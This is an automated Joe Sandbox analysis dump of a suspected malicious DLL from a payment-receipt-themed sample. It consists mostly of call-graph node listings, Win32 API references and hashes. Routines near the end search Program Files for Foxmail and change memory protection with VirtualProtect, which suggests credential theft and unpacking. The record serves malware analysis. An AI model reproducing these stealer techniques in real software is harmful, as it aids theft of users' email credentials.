6576->6582 6583 1000571e _free 20 API calls 6577->6583 6578 10007dfe 6584 1000571e _free 20 API calls 6578->6584 6590 100090ba 6579->6590 6580 10007d9e 6580->6578 6588 1000571e 20 API calls _free 6580->6588 6618 100091b8 6581->6618 6587 1000571e _free 20 API calls 6582->6587 6583->6563 6589 10007e04 6584->6589 6587->6564 6588->6580 6589->6556 6591 100090cb 6590->6591 6617 100091b4 6590->6617 6592 100090dc 6591->6592 6593 1000571e _free 20 API calls 6591->6593 6594 100090ee 6592->6594 6596 1000571e _free 20 API calls 6592->6596 6593->6592 6595 10009100 6594->6595 6597 1000571e _free 20 API calls 6594->6597 6598 10009112 6595->6598 6599 1000571e _free 20 API calls 6595->6599 6596->6594 6597->6595 6600 10009124 6598->6600 6601 1000571e _free 20 API calls 6598->6601 6599->6598 6602 10009136 6600->6602 6604 1000571e _free 20 API calls 6600->6604 6601->6600 6603 10009148 6602->6603 6605 1000571e _free 20 API calls 6602->6605 6606 1000915a 6603->6606 6607 1000571e _free 20 API calls 6603->6607 6604->6602 6605->6603 6608 1000571e _free 20 API calls 6606->6608 6611 1000916c 6606->6611 6607->6606 6608->6611 6609 10009190 6614 100091a2 6609->6614 6615 1000571e _free 20 API calls 6609->6615 6610 1000917e 6610->6609 6613 1000571e _free 20 API calls 6610->6613 6611->6610 6612 1000571e _free 20 API calls 6611->6612 6612->6610 6613->6609 6616 1000571e _free 20 API calls 6614->6616 6614->6617 6615->6614 6616->6617 6617->6568 6619 100091c5 6618->6619 6629 1000921d 6618->6629 6620 1000571e _free 20 API calls 6619->6620 6621 100091d5 6619->6621 6620->6621 6622 100091e7 6621->6622 6623 1000571e _free 20 API calls 6621->6623 6624 100091f9 6622->6624 6626 1000571e _free 20 API calls 6622->6626 6623->6622 6625 1000920b 6624->6625 6627 1000571e _free 20 API calls 6624->6627 6628 1000571e _free 20 API calls 6625->6628 6625->6629 6626->6624 6627->6625 6628->6629 6629->6570 6631 10007e60 6630->6631 6632 10007e42 6630->6632 6631->6580 6632->6631 6636 1000925d 6632->6636 6635 1000571e _free 20 
API calls 6635->6631 6637 10007e5a 6636->6637 6638 1000926e 6636->6638 6637->6635 6672 10009221 6638->6672 6641 10009221 __fassign 20 API calls 6642 10009281 6641->6642 6643 10009221 __fassign 20 API calls 6642->6643 6644 1000928c 6643->6644 6645 10009221 __fassign 20 API calls 6644->6645 6646 10009297 6645->6646 6647 10009221 __fassign 20 API calls 6646->6647 6648 100092a5 6647->6648 6649 1000571e _free 20 API calls 6648->6649 6650 100092b0 6649->6650 6651 1000571e _free 20 API calls 6650->6651 6652 100092bb 6651->6652 6653 1000571e _free 20 API calls 6652->6653 6654 100092c6 6653->6654 6655 10009221 __fassign 20 API calls 6654->6655 6656 100092d4 6655->6656 6657 10009221 __fassign 20 API calls 6656->6657 6658 100092e2 6657->6658 6659 10009221 __fassign 20 API calls 6658->6659 6660 100092f3 6659->6660 6661 10009221 __fassign 20 API calls 6660->6661 6662 10009301 6661->6662 6663 10009221 __fassign 20 API calls 6662->6663 6664 1000930f 6663->6664 6665 1000571e _free 20 API calls 6664->6665 6666 1000931a 6665->6666 6667 1000571e _free 20 API calls 6666->6667 6668 10009325 6667->6668 6669 1000571e _free 20 API calls 6668->6669 6670 10009330 6669->6670 6671 1000571e _free 20 API calls 6670->6671 6671->6637 6673 10009258 6672->6673 6674 10009248 6672->6674 6673->6641 6674->6673 6675 1000571e _free 20 API calls 6674->6675 6675->6674 6676->6561 6678 10006d8a ___DestructExceptionObject 6677->6678 6679 10005af6 _abort 38 API calls 6678->6679 6681 10006d94 6679->6681 6682 10006e18 _abort 6681->6682 6683 100055a8 _abort 38 API calls 6681->6683 6685 1000571e _free 20 API calls 6681->6685 6686 10005671 RtlEnterCriticalSection 6681->6686 6687 10006e0f 6681->6687 6682->6540 6683->6681 6685->6681 6686->6681 6690 100056b9 RtlLeaveCriticalSection 6687->6690 6689 10006e16 6689->6681 6690->6689 7257 10007a80 7258 10007a8d 7257->7258 7259 1000637b _abort 20 API calls 7258->7259 7260 10007aa7 7259->7260 7261 1000571e _free 20 API calls 7260->7261 7262 10007ab3 7261->7262 7263 1000637b 
_abort 20 API calls 7262->7263 7266 10007ad9 7262->7266 7265 10007acd 7263->7265 7264 10005eb7 11 API calls 7264->7266 7267 1000571e _free 20 API calls 7265->7267 7266->7264 7268 10007ae5 7266->7268 7267->7266 6082 10007103 GetCommandLineA GetCommandLineW 6083 10005303 6086 100050a5 6083->6086 6095 1000502f 6086->6095 6089 1000502f 5 API calls 6090 100050c3 6089->6090 6099 10005000 6090->6099 6093 10005000 20 API calls 6094 100050d9 6093->6094 6096 10005048 6095->6096 6097 10002ada _ValidateLocalCookies 5 API calls 6096->6097 6098 10005069 6097->6098 6098->6089 6100 1000502a 6099->6100 6101 1000500d 6099->6101 6100->6093 6102 10005024 6101->6102 6103 1000571e _free 20 API calls 6101->6103 6104 1000571e _free 20 API calls 6102->6104 6103->6101 6104->6100 6691 1000af43 6692 1000af59 6691->6692 6693 1000af4d 6691->6693 6693->6692 6694 1000af52 CloseHandle 6693->6694 6694->6692 6695 1000a945 6696 1000a96d 6695->6696 6697 1000a9a5 6696->6697 6698 1000a997 6696->6698 6699 1000a99e 6696->6699 6704 1000aa17 6698->6704 6708 1000aa00 6699->6708 6705 1000aa20 6704->6705 6712 1000b19b 6705->6712 6709 1000aa20 6708->6709 6710 1000b19b __startOneArgErrorHandling 21 API calls 6709->6710 6711 1000a9a3 6710->6711 6713 1000b1da __startOneArgErrorHandling 6712->6713 6715 1000b25c __startOneArgErrorHandling 6713->6715 6722 1000b59e 6713->6722 6720 1000b286 6715->6720 6725 100078a3 6715->6725 6717 1000b292 6719 10002ada _ValidateLocalCookies 5 API calls 6717->6719 6721 1000a99c 6719->6721 6720->6717 6729 1000b8b2 6720->6729 6736 1000b5c1 6722->6736 6726 100078cb 6725->6726 6727 10002ada _ValidateLocalCookies 5 API calls 6726->6727 6728 100078e8 6727->6728 6728->6720 6730 1000b8d4 6729->6730 6731 1000b8bf 6729->6731 6733 10006368 _free 20 API calls 6730->6733 6732 1000b8d9 6731->6732 6734 10006368 _free 20 API calls 6731->6734 6732->6717 6733->6732 6735 1000b8cc 6734->6735 6735->6717 6737 1000b5ec __raise_exc 6736->6737 6738 1000b7e5 RaiseException 6737->6738 6739 1000b5bc 6738->6739 
6739->6715 7520 1000a1c6 IsProcessorFeaturePresent 7521 10007bc7 7522 10007bd3 ___DestructExceptionObject 7521->7522 7523 10007c0a _abort 7522->7523 7529 10005671 RtlEnterCriticalSection 7522->7529 7525 10007be7 7526 10007f86 __fassign 20 API calls 7525->7526 7527 10007bf7 7526->7527 7530 10007c10 7527->7530 7529->7525 7533 100056b9 RtlLeaveCriticalSection 7530->7533 7532 10007c17 7532->7523 7533->7532 6740 10005348 6741 10003529 ___vcrt_uninitialize 8 API calls 6740->6741 6742 1000534f 6741->6742 6743 10007b48 6753 10008ebf 6743->6753 6747 10007b55 6766 1000907c 6747->6766 6750 10007b7f 6751 1000571e _free 20 API calls 6750->6751 6752 10007b8a 6751->6752 6770 10008ec8 6753->6770 6755 10007b50 6756 10008fdc 6755->6756 6757 10008fe8 ___DestructExceptionObject 6756->6757 6790 10005671 RtlEnterCriticalSection 6757->6790 6759 1000905e 6804 10009073 6759->6804 6761 10009032 RtlDeleteCriticalSection 6764 1000571e _free 20 API calls 6761->6764 6762 1000906a _abort 6762->6747 6765 10008ff3 6764->6765 6765->6759 6765->6761 6791 1000a09c 6765->6791 6767 10009092 6766->6767 6768 10007b64 RtlDeleteCriticalSection 6766->6768 6767->6768 6769 1000571e _free 20 API calls 6767->6769 6768->6747 6768->6750 6769->6768 6771 10008ed4 ___DestructExceptionObject 6770->6771 6780 10005671 RtlEnterCriticalSection 6771->6780 6773 10008f77 6785 10008f97 6773->6785 6776 10008f83 _abort 6776->6755 6778 10008e78 66 API calls 6779 10008ee3 6778->6779 6779->6773 6779->6778 6781 10007b94 RtlEnterCriticalSection 6779->6781 6782 10008f6d 6779->6782 6780->6779 6781->6779 6788 10007ba8 RtlLeaveCriticalSection 6782->6788 6784 10008f75 6784->6779 6789 100056b9 RtlLeaveCriticalSection 6785->6789 6787 10008f9e 6787->6776 6788->6784 6789->6787 6790->6765 6792 1000a0a8 ___DestructExceptionObject 6791->6792 6793 1000a0b9 6792->6793 6794 1000a0ce 6792->6794 6795 10006368 _free 20 API calls 6793->6795 6803 1000a0c9 _abort 6794->6803 6807 10007b94 RtlEnterCriticalSection 6794->6807 6797 1000a0be 6795->6797 6799 
100062ac ___std_exception_copy 26 API calls 6797->6799 6798 1000a0ea 6808 1000a026 6798->6808 6799->6803 6801 1000a0f5 6824 1000a112 6801->6824 6803->6765 7072 100056b9 RtlLeaveCriticalSection 6804->7072 6806 1000907a 6806->6762 6807->6798 6809 1000a033 6808->6809 6810 1000a048 6808->6810 6811 10006368 _free 20 API calls 6809->6811 6816 1000a043 6810->6816 6827 10008e12 6810->6827 6812 1000a038 6811->6812 6814 100062ac ___std_exception_copy 26 API calls 6812->6814 6814->6816 6816->6801 6817 1000907c 20 API calls 6818 1000a064 6817->6818 6833 10007a5a 6818->6833 6820 1000a06a 6840 1000adce 6820->6840 6823 1000571e _free 20 API calls 6823->6816 7071 10007ba8 RtlLeaveCriticalSection 6824->7071 6826 1000a11a 6826->6803 6828 10008e2a 6827->6828 6829 10008e26 6827->6829 6828->6829 6830 10007a5a 26 API calls 6828->6830 6829->6817 6831 10008e4a 6830->6831 6855 10009a22 6831->6855 6834 10007a66 6833->6834 6835 10007a7b 6833->6835 6836 10006368 _free 20 API calls 6834->6836 6835->6820 6837 10007a6b 6836->6837 6838 100062ac ___std_exception_copy 26 API calls 6837->6838 6839 10007a76 6838->6839 6839->6820 6841 1000adf2 6840->6841 6842 1000addd 6840->6842 6843 1000ae2d 6841->6843 6848 1000ae19 6841->6848 6844 10006355 __dosmaperr 20 API calls 6842->6844 6845 10006355 __dosmaperr 20 API calls 6843->6845 6846 1000ade2 6844->6846 6849 1000ae32 6845->6849 6847 10006368 _free 20 API calls 6846->6847 6852 1000a070 6847->6852 7028 1000ada6 6848->7028 6851 10006368 _free 20 API calls 6849->6851 6853 1000ae3a 6851->6853 6852->6816 6852->6823 6854 100062ac ___std_exception_copy 26 API calls 6853->6854 6854->6852 6856 10009a2e ___DestructExceptionObject 6855->6856 6857 10009a36 6856->6857 6858 10009a4e 6856->6858 6880 10006355 6857->6880 6860 10009aec 6858->6860 6864 10009a83 6858->6864 6862 10006355 __dosmaperr 20 API calls 6860->6862 6865 10009af1 6862->6865 6863 10006368 _free 20 API calls 6866 10009a43 _abort 6863->6866 6883 10008c7b RtlEnterCriticalSection 6864->6883 6868 10006368 
[Execution graph residue: the Joe Sandbox function call graph for this sample's module was extracted as a flat run of node ids, function addresses in the 0x1000xxxx range and edges of the form `6865->6868`, which cannot be rendered here. Recoverable information: the graph covers DLL entry-point code (dllmain_dispatch, dllmain_raw, dllmain_crt_process_attach, dllmain_crt_process_detach, ___scrt_dllmain_exception_filter), CRT internals (_free, __dosmaperr, _abort, _ValidateLocalCookies, ___std_exception_copy, ___scrt_fastfail, __fassign, __freea, __startOneArgErrorHandling, __raise_exc, __crt_fast_encode_pointer, ___vcrt_uninitialize, ___vcrt_FlsGetValue, ___vcrt_FlsSetValue, __RTC_Initialize), and the following Win32 APIs reached from those functions: WriteFile, ReadFile, CreateFileW, CopyFileW, DeleteFileW, GetFileSize, GetFileType, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, FindFirstFileExA, SetFilePointerEx, CloseHandle, SetStdHandle, GetStdHandle, GetStartupInfoW, GetConsoleCP, GetConsoleMode, WriteConsoleW, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, LCMapStringW, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, GetEnvironmentVariableW, GetEnvironmentStringsW, FreeEnvironmentStringsW, lstrlenW, lstrcatW, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, LoadLibraryExW, FreeLibrary, VirtualProtect, RtlAllocateHeap, HeapFree, GetProcessHeap, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, InitializeCriticalSectionAndSpinCount, RtlInterlockedFlushSList, RtlDecodePointer, RtlUnwind, TlsGetValue, TlsSetValue, TlsFree, GetLastError, SetLastError, RaiseException, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter.]
10005b41 6279->6281 6282 10005b32 6280->6282 6281->6278 6283 10005b48 6281->6283 6284 10005b6d SetLastError 6282->6284 6285 1000593c _abort 20 API calls 6283->6285 6287 100055a8 _abort 35 API calls 6284->6287 6286 10005b53 6285->6286 6288 1000571e _free 20 API calls 6286->6288 6289 10005b79 6287->6289 6290 10005b5a 6288->6290 6290->6277 6290->6284 6292 10002ada _ValidateLocalCookies 5 API calls 6291->6292 6293 1000bdd4 6292->6293 6293->6293 6294->6269 6296 100049a7 _abort 6295->6296 6303 100049bf 6296->6303 6317 10004af5 GetModuleHandleW 6296->6317 6300 10004a65 6334 10004aa5 6300->6334 6326 10005671 RtlEnterCriticalSection 6303->6326 6305 10004a3c 6307 10004a54 6305->6307 6330 10004669 6305->6330 6306 100049c7 6306->6300 6306->6305 6327 1000527a 6306->6327 6313 10004669 _abort 5 API calls 6307->6313 6308 10004a82 6337 10004ab4 6308->6337 6309 10004aae 6311 1000bdc9 _abort 5 API calls 6309->6311 6316 10004ab3 6311->6316 6313->6300 6318 100049b3 6317->6318 6318->6303 6319 10004b39 GetModuleHandleExW 6318->6319 6320 10004b63 GetProcAddress 6319->6320 6321 10004b78 6319->6321 6320->6321 6322 10004b95 6321->6322 6323 10004b8c FreeLibrary 6321->6323 6324 10002ada _ValidateLocalCookies 5 API calls 6322->6324 6323->6322 6325 10004b9f 6324->6325 6325->6303 6326->6306 6345 10005132 6327->6345 6331 10004698 6330->6331 6332 10002ada _ValidateLocalCookies 5 API calls 6331->6332 6333 100046c1 6332->6333 6333->6307 6367 100056b9 RtlLeaveCriticalSection 6334->6367 6336 10004a7e 6336->6308 6336->6309 6368 10006025 6337->6368 6340 10004ae2 6343 10004b39 _abort 8 API calls 6340->6343 6341 10004ac2 GetPEB 6341->6340 6342 10004ad2 GetCurrentProcess TerminateProcess 6341->6342 6342->6340 6344 10004aea ExitProcess 6343->6344 6348 100050e1 6345->6348 6347 10005156 6347->6305 6349 100050ed ___DestructExceptionObject 6348->6349 6356 10005671 RtlEnterCriticalSection 6349->6356 6351 100050fb 6357 1000515a 6351->6357 6355 10005119 _abort 6355->6347 6356->6351 6360 10005182 6357->6360 6361 
1000517a 6357->6361 6358 10002ada _ValidateLocalCookies 5 API calls 6359 10005108 6358->6359 6363 10005126 6359->6363 6360->6361 6362 1000571e _free 20 API calls 6360->6362 6361->6358 6362->6361 6366 100056b9 RtlLeaveCriticalSection 6363->6366 6365 10005130 6365->6355 6366->6365 6367->6336 6369 10006040 6368->6369 6370 1000604a 6368->6370 6372 10002ada _ValidateLocalCookies 5 API calls 6369->6372 6371 10005c45 _abort 5 API calls 6370->6371 6371->6369 6373 10004abe 6372->6373 6373->6340 6373->6341 6374 10001f3f 6375 10001f4b ___DestructExceptionObject 6374->6375 6392 1000247c 6375->6392 6377 10001f52 6378 10002041 6377->6378 6379 10001f7c 6377->6379 6386 10001f57 ___scrt_is_nonwritable_in_current_image 6377->6386 6415 10002639 IsProcessorFeaturePresent 6378->6415 6403 100023de 6379->6403 6382 10002048 6383 10001f8b __RTC_Initialize 6383->6386 6406 100022fc RtlInitializeSListHead 6383->6406 6385 10001f99 ___scrt_initialize_default_local_stdio_options 6407 100046c5 6385->6407 6390 10001fb8 6390->6386 6391 10004669 _abort 5 API calls 6390->6391 6391->6386 6393 10002485 6392->6393 6419 10002933 IsProcessorFeaturePresent 6393->6419 6397 1000249a 6397->6377 6398 10002496 6398->6397 6430 100053c8 6398->6430 6401 100024b1 6401->6377 6504 100024b5 6403->6504 6405 100023e5 6405->6383 6406->6385 6408 100046dc 6407->6408 6409 10002ada _ValidateLocalCookies 5 API calls 6408->6409 6410 10001fad 6409->6410 6410->6386 6411 100023b3 6410->6411 6412 100023b8 ___scrt_release_startup_lock 6411->6412 6413 10002933 ___isa_available_init IsProcessorFeaturePresent 6412->6413 6414 100023c1 6412->6414 6413->6414 6414->6390 6416 1000264e ___scrt_fastfail 6415->6416 6417 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6416->6417 6418 10002744 ___scrt_fastfail 6417->6418 6418->6382 6420 10002491 6419->6420 6421 100034ea 6420->6421 6422 100034ef ___vcrt_initialize_winapi_thunks 6421->6422 6441 10003936 6422->6441 6426 10003505 6427 10003510 6426->6427 6455 
10003972 6426->6455 6427->6398 6429 100034fd 6429->6398 6496 10007457 6430->6496 6433 10003529 6434 10003532 6433->6434 6435 10003543 6433->6435 6436 1000391b ___vcrt_uninitialize_ptd 6 API calls 6434->6436 6435->6397 6437 10003537 6436->6437 6438 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6437->6438 6439 1000353c 6438->6439 6500 10003c50 6439->6500 6442 1000393f 6441->6442 6444 10003968 6442->6444 6445 100034f9 6442->6445 6459 10003be0 6442->6459 6446 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6444->6446 6445->6429 6447 100038e8 6445->6447 6446->6445 6477 10003af1 6447->6477 6450 100038fd 6450->6426 6453 10003918 6453->6426 6456 1000399c 6455->6456 6457 1000397d 6455->6457 6456->6429 6458 10003987 RtlDeleteCriticalSection 6457->6458 6458->6456 6458->6458 6464 10003a82 6459->6464 6461 10003bfa 6462 10003c18 InitializeCriticalSectionAndSpinCount 6461->6462 6463 10003c03 6461->6463 6462->6463 6463->6442 6465 10003aa6 __crt_fast_encode_pointer 6464->6465 6466 10003aaa 6464->6466 6465->6461 6466->6465 6470 100039be 6466->6470 6469 10003ac4 GetProcAddress 6469->6465 6475 100039cd try_get_first_available_module 6470->6475 6471 10003a77 6471->6465 6471->6469 6472 100039ea LoadLibraryExW 6473 10003a05 GetLastError 6472->6473 6472->6475 6473->6475 6474 10003a60 FreeLibrary 6474->6475 6475->6471 6475->6472 6475->6474 6476 10003a38 LoadLibraryExW 6475->6476 6476->6475 6478 10003a82 try_get_function 5 API calls 6477->6478 6479 10003b0b 6478->6479 6480 10003b24 TlsAlloc 6479->6480 6481 100038f2 6479->6481 6481->6450 6482 10003ba2 6481->6482 6483 10003a82 try_get_function 5 API calls 6482->6483 6484 10003bbc 6483->6484 6485 10003bd7 TlsSetValue 6484->6485 6486 1000390b 6484->6486 6485->6486 6486->6453 6487 1000391b 6486->6487 6488 1000392b 6487->6488 6489 10003925 6487->6489 6488->6450 6491 10003b2c 6489->6491 6492 10003a82 try_get_function 5 API calls 6491->6492 6493 10003b46 6492->6493 6494 10003b5e TlsFree 6493->6494 6495 10003b52 
6493->6495 6494->6495 6495->6488 6499 10007470 6496->6499 6497 10002ada _ValidateLocalCookies 5 API calls 6498 100024a3 6497->6498 6498->6401 6498->6433 6499->6497 6501 10003c7f 6500->6501 6502 10003c59 6500->6502 6501->6435 6502->6501 6503 10003c69 FreeLibrary 6502->6503 6503->6502 6505 100024c4 6504->6505 6506 100024c8 6504->6506 6505->6405 6507 10002639 ___scrt_fastfail 4 API calls 6506->6507 6509 100024d5 ___scrt_release_startup_lock 6506->6509 6508 10002559 6507->6508 6509->6405 7476 100067bf 7481 100067f4 7476->7481 7479 100067db 7480 1000571e _free 20 API calls 7480->7479 7482 10006806 7481->7482 7491 100067cd 7481->7491 7483 10006836 7482->7483 7484 1000680b 7482->7484 7483->7491 7492 100071d6 7483->7492 7485 1000637b _abort 20 API calls 7484->7485 7487 10006814 7485->7487 7488 1000571e _free 20 API calls 7487->7488 7488->7491 7489 10006851 7490 1000571e _free 20 API calls 7489->7490 7490->7491 7491->7479 7491->7480 7493 100071e1 7492->7493 7494 10007209 7493->7494 7495 100071fa 7493->7495 7498 10007218 7494->7498 7501 10008a98 7494->7501 7496 10006368 _free 20 API calls 7495->7496 7500 100071ff ___scrt_fastfail 7496->7500 7508 10008acb 7498->7508 7500->7489 7502 10008aa3 7501->7502 7503 10008ab8 RtlSizeHeap 7501->7503 7504 10006368 _free 20 API calls 7502->7504 7503->7498 7505 10008aa8 7504->7505 7506 100062ac ___std_exception_copy 26 API calls 7505->7506 7507 10008ab3 7506->7507 7507->7498 7509 10008ae3 7508->7509 7510 10008ad8 7508->7510 7512 10008aeb 7509->7512 7518 10008af4 _abort 7509->7518 7511 100056d0 21 API calls 7510->7511 7517 10008ae0 7511->7517 7515 1000571e _free 20 API calls 7512->7515 7513 10008af9 7516 10006368 _free 20 API calls 7513->7516 7514 10008b1e RtlReAllocateHeap 7514->7517 7514->7518 7515->7517 7516->7517 7517->7500 7518->7513 7518->7514 7519 1000474f _abort 7 API calls 7518->7519 7519->7518 7847 10005bff 7855 10005d5c 7847->7855 7850 10005c13 7851 10005b7a _abort 20 API calls 7852 10005c1b 7851->7852 7853 10005c28 7852->7853 
7854 10005c2b 11 API calls 7852->7854 7854->7850 7856 10005c45 _abort 5 API calls 7855->7856 7857 10005d83 7856->7857 7858 10005d9b TlsAlloc 7857->7858 7859 10005d8c 7857->7859 7858->7859 7860 10002ada _ValidateLocalCookies 5 API calls 7859->7860 7861 10005c09 7860->7861 7861->7850 7861->7851

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                    • FindClose.KERNEL32(00000000), ref: 100011DB
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                    • String ID:
                                                    • API String ID: 1083526818-0
                                                    • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                    • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                    • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                    • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                    Control-flow Graph

                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                      • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                      • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                      • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                      • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                    • lstrlenW.KERNEL32(?), ref: 100014C5
                                                    • lstrlenW.KERNEL32(?), ref: 100014E0
                                                    • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                    • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                    • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                    • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                    • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                    • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                    • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                    • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                    • String ID: )$Foxmail$ProgramFiles
                                                    • API String ID: 672098462-2938083778
                                                    • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                    • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                    • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                    • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                      • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2099061454-0
                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                    • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                    • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                    Control-flow Graph

                                                    control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 94 1000c7fa-1000c7fe 91->94 95 1000c85b-1000c85e 91->95 96 1000c870 92->96 97 1000c866-1000c86b 92->97 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 102 1000c865 94->102 103 1000c800-1000c80b GetProcAddress 94->103 100 1000c85f-1000c860 GetProcAddress 95->100 96->90 97->92 98->100 99->95 100->102 102->97 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                      • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                      • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
